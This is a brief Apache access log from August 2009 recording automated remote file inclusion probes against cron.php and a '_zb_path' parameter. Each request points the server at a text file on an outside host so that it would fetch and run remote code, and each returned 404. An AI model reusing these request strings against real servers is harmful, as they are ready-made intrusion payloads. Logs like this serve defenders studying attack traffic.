69.174.114.20 - - [16/Aug/2009:04:27:08 -0500] "GET /logs/access_log.1236902400//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:09 -0500] "GET /logs/access_log.1240704000//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:11 -0500] "GET /logs/access_log.1240704000//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:12 -0500] "GET /logs/access_log.1240704000//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.73.17.7 - - [16/Aug/2009:04:27:17 -0500] "GET /logs/access_log.1239062400/////?_zb_path=http://www.princedent.com/bbs/set_up/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:21 -0500] "GET //cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
